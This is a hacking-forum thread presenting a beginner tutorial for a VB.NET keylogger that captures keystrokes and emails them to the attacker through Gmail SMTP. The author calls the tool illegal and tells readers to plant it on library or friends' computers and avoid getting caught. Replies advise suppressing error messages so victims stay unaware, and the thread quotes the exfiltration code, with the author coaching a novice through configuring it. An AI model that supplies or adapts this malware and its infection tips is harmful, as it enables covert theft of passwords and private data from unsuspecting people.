[TUT][VB8-10] How to Make a Simple eMail Sending Keylogger! [N00B FRIENDLY][VIDEO+SOURCE]

FAQ

What is a Keylogger?
A Keylogger is a generally malicious program that records keystrokes by the user.

Why use a Keylogger?
Keyloggers can record data that is normally in-accessible. Such as Passwords, or other secure Data.

How does this Keylogger work?
This keylogger simply records keystrokes, and sends them to a specified eMail at a specified times.

How do I Infect others?
Put the compiled program on a USB stick, and move it to a public computer, such as a library, or a friends computer. Maybe even your own computer! Just don't get Caught!

Illegal? Legal?
Keyloggers themselves are not illegal. The ways in which keyloggers are used, and acquired is where legality comes into effect. There are some Commercial home keyloggers on the market, which are legal. Keyloggers like this one, are infact, Illegal.

Btw, you are using SMTP server. It easily to know that it has keylogger in their pc. Because of the pop error.. "SMTP error blah blah blah.... error sending email to ..blah blah.."

This is true, Just make sure there are no errors before infecting someone. ;D

To remove this errror you should use Try---Catch aka Error Handling so it doesn't show any errors while sending mail.

Yeah, Imma include something like that in my advanced keylogger tutorial.

I just felt I should make a simple tut for shits n giggles. +Bored @ 2AM. ;)

How about you watch the video?

Its vb08 Code, which works with vb10.

Try things before you comment, Kay? Or provide a screenshot. I'll gladly help you.
Nice tutorial. You should work on others .

I don't understand how some people are too stupid to think of error handling...

Edit: On topic, thanks for the source. Although there are hundreds of other keylogger sources around here, this one is nice and simple. A good base.

Edit Edit: I took a look and I suggest you use TextBox1.AppendText(Chr(i))

It just looks a lot better than Textbox1.Text = Textbox1.Text + etc. IDK, I guess to each his own.

I didn't think of using that. :D
Thanks for the tip. :)
Took an hour to write a few lines?

Or even better, use a StringBuilder.

Servers shouldn't really be WFA, and so you should avoid components where possible, as it adds to the inefficiency of the program.

To write the tutorial, & shoot the video.
What mainly took the longest was the render time on the video.
As you can see, it only took my 7 minutes to write the actual code. ;p
Could anyone tell me how does it work?? i dont understand this part:

SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "password")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"
SmtpServer.EnableSsl = True
mail.To.Add("[email protected]")
mail.From = New MailAddress("[email protected]")
mail.Subject = "password"
mail.Body = TextBox1.Text
SmtpServer.Send(mail)

Does it only work with GMAIL???
Should i write my username and password to this part??? -> SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "password")
Should i type the targets email here??? mail.From = New MailAddress("[email protected]")
After i have debugged the program i can build it as windows application.. But then what i have to do with this program? send to the targets email??? sorry im a noob :D i would be glad if anyone could help!

Yes, you'll need a gmail.
Replace [email protected] with your email, and put your password where it says "Password"
Replace [email protected] with a second email. IT CAN BE THE SAME AS THE FIRST. ([email protected])
Then the [email protected] could be anything. Just make sure its got an @gmail.com on it. (Just use the same email)

If you need any help, I can TV you.
